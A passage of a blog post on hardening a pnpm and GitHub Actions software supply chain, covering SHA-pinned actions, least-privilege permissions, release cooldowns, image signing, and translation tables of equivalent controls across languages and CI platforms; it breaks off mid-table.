&lt;p&gt;&lt;strong&gt;Provenance lookup.&lt;/strong&gt; &lt;code&gt;rekor-cli search --artifact &amp;lt;digest&amp;gt;&lt;/code&gt; answers "did our pipeline sign this digest?" &lt;code&gt;gh attestation verify&lt;/code&gt; answers it for GitHub-attested artifacts. &lt;strong&gt;OSV-Scanner&lt;/strong&gt; retroactively queries your lockfile against advisory windows ("did we have axios 1.14.x in a build between March 30 12:00 UTC and 15:00 UTC?"). &lt;strong&gt;GUAC&lt;/strong&gt; (Graph for Understanding Artifact Composition) builds a queryable provenance graph across artifacts. &lt;strong&gt;Trivy&lt;/strong&gt; + &lt;strong&gt;Grype&lt;/strong&gt; drive SBOM-based scanning post-incident; &lt;strong&gt;Dependency-Track&lt;/strong&gt; is the consumption side. An SBOM you don't continuously diff against vulnerability feeds is a compliance artefact, not a control.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;OIDC token revocation playbook.&lt;/strong&gt; Know how to invalidate cached OIDC subject claims. Know which AWS role trust policies to tighten. Know how to query Sigstore Rekor for "did we sign this digest during the suspect window?" All process documentation, not tooling.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Secret rotation in dependency order.&lt;/strong&gt; If CI is suspect, rotation order matters. Start at the leaves (npm publish tokens, third-party SaaS keys), then deploy roles, then DB credentials. Rotating root credentials first invalidates the OIDC tokens you'd need to rotate the leaves. Document who calls whom; security incidents are a bad time to discover ambiguity.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Image quarantine.&lt;/strong&gt; ECR lifecycle policy plus an admission-controller tag-block on the suspected window's digests. Until your &lt;code&gt;cosign verify&lt;/code&gt; says the digest you're running is the digest you signed, treat anything from that window as suspect.&lt;/p&gt;

&lt;p&gt;Prevention buys time for detection. Detection buys time for response. Get all three in writing before you need them.&lt;/p&gt;




&lt;h2&gt;
  
  
  What one week of focused work actually moved
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Control&lt;/th&gt;
&lt;th&gt;Before&lt;/th&gt;
&lt;th&gt;After&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Third-party Action SHA pinning&lt;/td&gt;
&lt;td&gt;0% of 110 &lt;code&gt;uses:&lt;/code&gt; lines&lt;/td&gt;
&lt;td&gt;100% with &lt;code&gt;pinact&lt;/code&gt; CI gate&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Workflow &lt;code&gt;permissions: write-all&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;8 of 16 workflows&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lockfile integrity coverage&lt;/td&gt;
&lt;td&gt;99.97% (1 off-registry tarball, no &lt;code&gt;integrity:&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;99.97% + CI allowlist enforcement with rationale per off-registry entry&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;minimumReleaseAge&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;12 hours&lt;/td&gt;
&lt;td&gt;3 days&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Production Dockerfile USER directive&lt;/td&gt;
&lt;td&gt;0 of 7 (all root)&lt;/td&gt;
&lt;td&gt;7 of 7 (non-root)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Production base image digest pinning&lt;/td&gt;
&lt;td&gt;0 of 7&lt;/td&gt;
&lt;td&gt;7 of 7&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Image signing&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;cosign keyless on every ECR push, workflow-path-anchored verify identity&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PR-time secret scanning&lt;/td&gt;
&lt;td&gt;pre-commit only (skippable)&lt;/td&gt;
&lt;td&gt;pre-commit + CI (unskippable)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PR-time SAST&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;CodeQL &lt;code&gt;security-extended&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Workflow security audit&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;actionlint&lt;/code&gt; + &lt;code&gt;zizmor&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dependency CVE gate&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;pnpm audit --prod --audit-level high&lt;/code&gt; with documented allowlist&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SBOM generation&lt;/td&gt;
&lt;td&gt;none&lt;/td&gt;
&lt;td&gt;CycloneDX + SPDX on every push to main&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The week wasn't a checklist. It was a sequence of specific findings, in the order I hit them:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Day 1: Boundary 7.&lt;/strong&gt; Audit of &lt;code&gt;.github/workflows/&lt;/code&gt;. Every external &lt;code&gt;uses:&lt;/code&gt; was tag-pinned. Pinned all 110 to 40-character SHAs with tag comments. &lt;code&gt;pinact run --check --verify&lt;/code&gt; added as required status check.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 1: Boundary 8.&lt;/strong&gt; 8 of 16 workflows ran with &lt;code&gt;permissions: write-all&lt;/code&gt;. Tightened to workflow-level &lt;code&gt;permissions: {}&lt;/code&gt; plus per-job grants. &lt;code&gt;zizmor&lt;/code&gt; added as the gate. &lt;strong&gt;First staging deploy broke&lt;/strong&gt; because &lt;code&gt;permissions: {}&lt;/code&gt; revealed an undeclared &lt;code&gt;packages: read&lt;/code&gt; that a publish job had been silently inheriting through the old &lt;code&gt;write-all&lt;/code&gt;. Caught in PR; one-line add to per-job permissions.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 2: Boundary 9.&lt;/strong&gt; The &lt;code&gt;opencode-review.yml:108&lt;/code&gt; CWE-78 (the lede). Four-line fix.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 2: Boundary 10.&lt;/strong&gt; &lt;code&gt;apps/front/remote-homepage/vite.config.ts:30&lt;/code&gt; had &lt;code&gt;'process.env': process.env,&lt;/code&gt; with a TODO comment. Every CI environment variable visible to the build host was being baked into the client bundle. Replaced with an explicit allowlist.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 3: Boundary 8.&lt;/strong&gt; &lt;code&gt;build-and-publish-service.yml&lt;/code&gt; lines 128 and 469: both Wiz container scan steps had &lt;code&gt;continue-on-error: true || true&lt;/code&gt;. Doubly non-blocking. Two engineers had to reach for the keyboard to make those scans non-fatal. Removed both bypasses.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 3: Boundary 3.&lt;/strong&gt; Lockfile audit found one off-registry tarball: &lt;code&gt;https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz&lt;/code&gt;, in two lambda &lt;code&gt;package.json&lt;/code&gt; files. Allowlisted with rationale (SheetJS withdrew xlsx from npm in 2023).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 4: Boundary 12.&lt;/strong&gt; &lt;code&gt;pnpm.overrides&lt;/code&gt; audit; the lodash story below.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 4: Boundary 2.&lt;/strong&gt; &lt;code&gt;minimumReleaseAge&lt;/code&gt; calibration: started at 720 minutes (12 hours), tried 10080 (7 days), got blocked by a &lt;code&gt;postcss@8.5.12&lt;/code&gt; patch published four days earlier, settled at 4320 (3 days).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 4: Boundary 5.&lt;/strong&gt; Production Dockerfile sweep. 7 of 7 images ran as root. Added &lt;code&gt;USER node&lt;/code&gt;; switched nginx-fronted images to &lt;code&gt;nginxinc/nginx-unprivileged&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Day 5: Boundary 6.&lt;/strong&gt; Cosign keyless signing on every ECR push. Branch protection updated to require all six new gates as status checks.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The DX cost, honestly.&lt;/strong&gt; PR-time latency went from p50 4m / p95 9m to p50 6m / p95 14m. CodeQL &lt;code&gt;security-extended&lt;/code&gt; is the long pole at ~7m. False-positive rate after the first week of tuning: zizmor ~5%, gitleaks ~2% with the project-tuned config. Two engineers asked for a &lt;code&gt;--no-verify&lt;/code&gt; escape hatch on &lt;code&gt;pinact&lt;/code&gt; early on; we declined. One pushed back hard enough that I owed him a 1:1 walking through the tj-actions chain. The friction is real and you should plan for the conversation. Fast-path bypass: a &lt;code&gt;security-bypass&lt;/code&gt; label requires CODEOWNERS approval, expires on merge, audit-logged.&lt;/p&gt;




&lt;h2&gt;
  
  
  Five lessons that don't fit in a framework
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. The "patched version" you find in an advisory is not always the version you can ship.
&lt;/h3&gt;

&lt;p&gt;Day 4 the advisory for GHSA-r5fr-rjxr-66jc (HIGH, code injection via &lt;code&gt;_.template&lt;/code&gt;) said "fixed in 4.18.0." Our &lt;code&gt;pnpm.overrides&lt;/code&gt; had &lt;code&gt;lodash-es: 4.18.0&lt;/code&gt; and &lt;code&gt;lodash: 4.18.1&lt;/code&gt; both flagged green by the advisory.&lt;/p&gt;

&lt;p&gt;Then I checked the npm registry page. 4.18.0 was marked as a deprecated "Bad release." We were pinned to a withdrawn version, which is its own kind of supply-chain debt. The current stable was 4.17.23. The patch wasn't in it.&lt;/p&gt;

&lt;p&gt;I kept the terminal open and ran:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-rE&lt;/span&gt; &lt;span class="s1"&gt;'_\.template\('&lt;/span&gt; apps/ libs/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Nothing. Across multiple projects, no production source called &lt;code&gt;_.template&lt;/code&gt;. The vulnerable code path was unreachable.&lt;/p&gt;

&lt;p&gt;That grep is a hand-rolled approximation of &lt;strong&gt;reachability analysis&lt;/strong&gt;  the formal name for "is the vulnerable function actually called from your code?" Tools that automate it: Endor Labs, Snyk Reachability, Semgrep Supply Chain, CodeQL with &lt;code&gt;taint-tracking&lt;/code&gt; queries. Eleven seconds with grep is the cheap version of the same idea. The expensive version costs money but covers transitive call paths grep can't see.&lt;/p&gt;

&lt;p&gt;The decision crystallised: allowlist with documented rationale, three-month expiry, named follow-up to migrate off lodash entirely.&lt;/p&gt;

&lt;p&gt;Three months from now the entry expires. CI fails again. Someone re-runs the grep and decides: still unreachable, renew? Or has someone added &lt;code&gt;_.template&lt;/code&gt; to a new feature, in which case the override is no longer safe. Either way, the decision happens. That's the difference between an allowlist with an expiry and an &lt;code&gt;eslint-disable-next-line&lt;/code&gt; that lives forever.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Aggressive controls block legitimate fixes. Calibrate, don't posture.
&lt;/h3&gt;

&lt;p&gt;Started at &lt;code&gt;minimumReleaseAge: 10080&lt;/code&gt; (7 days, pnpm's recommended baseline). Within the hour it blocked &lt;code&gt;postcss@8.5.12&lt;/code&gt;, a CVE patch published four days earlier. Dropped to 3 days.&lt;/p&gt;

&lt;p&gt;The "right" number depends on your workload. A healthcare-staffing platform tolerates 72 hours of CVE-patch latency more easily than fintech tolerates 12. Write down why you picked the number. Three days catches the noisy fast attacks (axios, ua-parser-js, @solana/web3.js were all yanked in &amp;lt;5 hours). It does not catch the patient ones (xz-utils ran 2 years; Shai-Hulud's worm re-publishes from already-trusted maintainer accounts can outlast any cooldown). &lt;code&gt;minimumReleaseAge&lt;/code&gt; is a layer, not the wall.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Detection without enforcement is not security.
&lt;/h3&gt;

&lt;p&gt;The week started with the Slack message above. The most striking finding: every right primitive was already there Wiz, SonarCloud, Renovate, gitleaks, custom rules. None of them were blocking merges. Wiz container scans were running with &lt;code&gt;continue-on-error: true || true&lt;/code&gt;. SonarCloud ran post-merge. Pre-commit gitleaks could be skipped with &lt;code&gt;--no-verify&lt;/code&gt;. Renovate filed PRs nobody was required to merge.&lt;/p&gt;

&lt;p&gt;Moving those gates into PR-time required-status-checks (same tools, same configurations, just &lt;code&gt;required: true&lt;/code&gt; in branch protection) was, in my judgment, the largest delta in actual risk reduction over the week. It's a judgment, not a measurement we don't have a counterfactual. Take it as senior intuition.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. The blast radius of a CI compromise is usually larger than any application bug.
&lt;/h3&gt;

&lt;p&gt;An app bug leaks data. A CI compromise leaks everything that has ever run through CI: AWS credentials, deploy keys, npm tokens, signing keys, source code, SBOMs, any customer-data backup that happened to touch a build step. Treat CI/CD like production, because it has the same blast radius.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. These controls assume a clean threat model. Both halves of that assumption fail.
&lt;/h3&gt;

&lt;p&gt;Most of the controls above assume the attacker is outside your org and your developers' laptops are clean. Both fail in roughly half the supply-chain incidents I've seen written up. xz-utils is the canonical maintainer-side case: a multi-year insider with valid signed commits every Phase 1 control passes. A compromised developer endpoint with a valid signed-commit identity bypasses CODEOWNERS, branch protection, and most of Phase 1. Endpoint posture and maintainer-identity verification are their own conversations. When you decide what to ship next, factor them in.&lt;/p&gt;




&lt;h2&gt;
  
  
  Process and culture
&lt;/h2&gt;

&lt;p&gt;Tools alone don't get you there. The process around them ends up doing more of the work than I'd expected. Three patterns that bound everything else:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;CODEOWNERS on every supply-chain surface.&lt;/strong&gt; Required reviewer on every workflow file, Dockerfile, dependency manifest, override file, and &lt;code&gt;audit-allowlist.json&lt;/code&gt; itself. Humans catch what static analysis can't see (intent, weird ownership, deprecated-but-popular packages); machines catch the rest.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Allowlists with expiry, never silent ignores.&lt;/strong&gt; Every accepted risk has rationale, verifier, and a date when it stops being accepted. CI fails at expiry and forces a re-decision rather than letting drift accumulate.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Default-deny as engineering culture.&lt;/strong&gt; &lt;code&gt;permissions: {}&lt;/code&gt; at workflow level. Empty Dockerfile &lt;code&gt;USER&lt;/code&gt; rejected. New dependency needs CODEOWNERS approval. Off-registry tarball needs written rationale. The friction surfaces decisions that would otherwise stay implicit.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When &lt;code&gt;zizmor&lt;/code&gt; flags a workflow, gitleaks catches a token, or an audit advisory blocks a merge, the response is "what process let this through?" not "who put it there?" The first question gets you better controls. The second one gets you quieter engineers.&lt;/p&gt;




&lt;h2&gt;
  
  
  What you can ship alone vs. what needs platform
&lt;/h2&gt;

&lt;p&gt;Half the controls above can be adopted by a single team owning a single repo. The other half need platform / security-org buy-in. The trap is adopting the team-side half without the platform-side half you eat the friction without the protection.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;A team can ship alone:&lt;/strong&gt; SHA-pinning their own workflows. Lockfile pins. &lt;code&gt;minimumReleaseAge&lt;/code&gt; in their own pnpm/Renovate config. Logger redaction in their own service. Default-deny &lt;code&gt;permissions:&lt;/code&gt; in their own workflows. Dockerfile non-root.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Needs platform / security org:&lt;/strong&gt; CODEOWNERS gating across the org. OIDC trust-policy authoring. Branch protection on &lt;code&gt;main&lt;/code&gt;. Admission controllers verifying cosign signatures at deploy time. Log retention infrastructure. Secret rotation runbooks. Cross-repo CI runner isolation.&lt;/p&gt;

&lt;p&gt;If you're a single team and the platform-side controls don't exist yet, the highest-leverage moves are the three that would have stopped both attacks in this article cold: SHA-pin every external &lt;code&gt;uses:&lt;/code&gt;, scope every &lt;code&gt;permissions:&lt;/code&gt; block to least privilege, set &lt;code&gt;minimumReleaseAge&lt;/code&gt; to 3+ days. The first two are local edits. The third is one config line. Together they're roughly two days of work.&lt;/p&gt;




&lt;h2&gt;
  
  
  Translation table: the boundaries in your stack
&lt;/h2&gt;

&lt;p&gt;This article uses pnpm + GitHub Actions because that's where I shipped the work. The boundaries don't care about the YAML.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Boundary&lt;/th&gt;
&lt;th&gt;pnpm/JS&lt;/th&gt;
&lt;th&gt;Python&lt;/th&gt;
&lt;th&gt;Java/Maven&lt;/th&gt;
&lt;th&gt;Go&lt;/th&gt;
&lt;th&gt;Rust&lt;/th&gt;
&lt;th&gt;Ruby&lt;/th&gt;
&lt;th&gt;.NET&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2. Pin to immutable identifier&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;package.json&lt;/code&gt; exact + &lt;code&gt;pnpm install --frozen-lockfile&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;pip-compile --generate-hashes&lt;/code&gt; + &lt;code&gt;--require-hashes&lt;/code&gt;; or &lt;code&gt;poetry install --no-update&lt;/code&gt;; or &lt;code&gt;uv sync --frozen --locked&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;mvn-dependency-lock-plugin&lt;/code&gt; + &lt;code&gt;dependencies.lock&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;go.sum&lt;/code&gt; + &lt;code&gt;GOFLAGS=-mod=readonly&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;Cargo.lock&lt;/code&gt; + &lt;code&gt;cargo --frozen --locked&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;Gemfile.lock&lt;/code&gt; + &lt;code&gt;bundle config set frozen true&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;packages.lock.json&lt;/code&gt; + &lt;code&gt;dotnet restore --locked-mode&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2. Cooldown on fresh publishes&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;minimumReleaseAge&lt;/code&gt; (pnpm-native)&lt;/td&gt;
&lt;td&gt;Renovate &lt;code&gt;minimumReleaseAge&lt;/code&gt; (covers PyPI); commercial: Socket, Phylum&lt;/td&gt;
&lt;td&gt;Renovate (covers Maven Central)&lt;/td&gt;
&lt;td&gt;Renovate (covers Go modules) + &lt;code&gt;govulncheck&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Renovate; &lt;code&gt;cargo-deny [advisories] yanked = "deny"&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Renovate; &lt;code&gt;bundler-audit&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Renovate&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;3. Lockfile integrity&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;integrity: sha512:...&lt;/code&gt; per entry&lt;/td&gt;
&lt;td&gt;hash via &lt;code&gt;--require-hashes&lt;/code&gt;; Poetry &lt;code&gt;content-hash&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Gradle &lt;code&gt;verification-metadata.xml&lt;/code&gt;; Maven &lt;code&gt;--strict-checksums&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;go.sum&lt;/code&gt; + &lt;code&gt;sum.golang.org&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Cargo lockfile checksums (built-in)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;bundle config set verify_files true&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;dotnet trust&lt;/code&gt; for signed packages&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;4. Lifecycle script gate&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;onlyBuiltDependencies&lt;/code&gt; + &lt;code&gt;--ignore-scripts&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;pip install --only-binary=:all:&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;audit &lt;code&gt;&amp;lt;build&amp;gt;&amp;lt;plugins&amp;gt;&lt;/code&gt; + checksum-pin them&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;cgo&lt;/code&gt; / &lt;code&gt;//go:generate&lt;/code&gt; controlled via Bazel/Nix sandbox&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;build.rs&lt;/code&gt; sandboxed via Bazel &lt;code&gt;rules_rust&lt;/code&gt; or &lt;code&gt;cargo-deny&lt;/code&gt; bans&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;bundle config force_ruby_platform true&lt;/code&gt; to skip native; or sandbox&lt;/td&gt;
&lt;td&gt;PackageReference (modern) doesn't run scripts; audit any &lt;code&gt;packages.config&lt;/code&gt; projects&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;5. Base image digest pin&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;FROM image:tag@sha256:...&lt;/code&gt; (any Dockerfile, any language)&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;6. Image signing&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;cosign + Sigstore (any registry, any image)&lt;/td&gt;
&lt;td&gt;same; PEP 740 attestations + &lt;code&gt;sigstore&lt;/code&gt; for wheels&lt;/td&gt;
&lt;td&gt;same; &lt;code&gt;sigstore-maven-plugin&lt;/code&gt; for JARs&lt;/td&gt;
&lt;td&gt;same; &lt;code&gt;slsa-github-generator/builder-go&lt;/code&gt; for SLSA&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;cargo-dist&lt;/code&gt; + Sigstore&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;dotnet nuget sign&lt;/code&gt;; NuGet signature verification&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;7. CI mutable-ref pin&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;uses: org/action@&amp;lt;sha&amp;gt;&lt;/code&gt;; &lt;code&gt;pinact&lt;/code&gt; enforce&lt;/td&gt;
&lt;td&gt;(Python doesn't have an "Actions" concept; this is CI-platform, not language)&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;8. Default-deny permissions&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;GHA &lt;code&gt;permissions: {}&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;(CI-platform; see CI table below)&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;11. Logger redaction&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;pino &lt;code&gt;redact:&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;structlog&lt;/code&gt; processors + &lt;code&gt;logging.Filter&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Logback &lt;code&gt;MaskingPatternLayout&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;zap&lt;/code&gt; custom encoder; &lt;code&gt;zerolog&lt;/code&gt; &lt;code&gt;.Strs("redacted", ...)&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;tracing&lt;/code&gt; &lt;code&gt;Layer&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Rails.config.filter_parameters&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Serilog &lt;code&gt;Enrichers.Sensitive&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;12. Force-pin transitive&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;pnpm.overrides&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;pip &lt;code&gt;constraints.txt&lt;/code&gt;; uv &lt;code&gt;[tool.uv] override-dependencies&lt;/code&gt;; Poetry → promote to direct&lt;/td&gt;
&lt;td&gt;Maven &lt;code&gt;&amp;lt;dependencyManagement&amp;gt;&lt;/code&gt;; Gradle &lt;code&gt;dependencySubstitution&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;replace&lt;/code&gt; directive in &lt;code&gt;go.mod&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;[patch.crates-io]&lt;/code&gt; in &lt;code&gt;Cargo.toml&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Direct &lt;code&gt;gem 'foo', '1.2.3'&lt;/code&gt; in &lt;code&gt;Gemfile&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;Directory.Packages.props&lt;/code&gt; central management&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;CI translations for Boundaries 5–9:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;GitHub Actions&lt;/th&gt;
&lt;th&gt;GitLab CI&lt;/th&gt;
&lt;th&gt;Buildkite&lt;/th&gt;
&lt;th&gt;CircleCI&lt;/th&gt;
&lt;th&gt;Jenkins&lt;/th&gt;
&lt;th&gt;AWS CodeBuild&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Mutable-ref pin (B7)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;uses: org/action@&amp;lt;sha&amp;gt;&lt;/code&gt; + &lt;code&gt;pinact&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;include: ref: &amp;lt;sha&amp;gt;&lt;/code&gt; + Renovate &lt;code&gt;gitlabci-include&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Plugin &lt;code&gt;@&amp;lt;sha&amp;gt;&lt;/code&gt; + Renovate &lt;code&gt;buildkite&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Inline orbs; or pin &lt;code&gt;orbs: foo/bar@&amp;lt;exact-version&amp;gt;&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;@Library('foo@&amp;lt;sha&amp;gt;')&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Pre-mirrored installers + checksum verify in &lt;code&gt;pre_build&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Default-deny perms (B8)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;permissions: {}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;id_tokens:&lt;/code&gt; per-job; protected variables&lt;/td&gt;
&lt;td&gt;Agent-queue ACLs; secrets via Vault Agent&lt;/td&gt;
&lt;td&gt;Restricted contexts&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;withCredentials&lt;/code&gt; per-step; folder-level isolation&lt;/td&gt;
&lt;td&gt;Per-project IAM role; &lt;code&gt;SECRETS_MANAGER&lt;/code&gt; vars&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;OIDC trust (B8)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;sub&lt;/code&gt;/&lt;code&gt;job_workflow_ref&lt;/code&gt; anchored&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;CI_JOB_JWT_V2&lt;/code&gt; audience-bound&lt;/td&gt;
&lt;td&gt;OIDC plugin since 2023&lt;/td&gt;
&lt;td&gt;&lt;code&gt;circleci/oidc-orb&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Workload identity / &lt;code&gt;manage-credentials-binding-plugin&lt;/code&gt;
&lt;/td&gt;
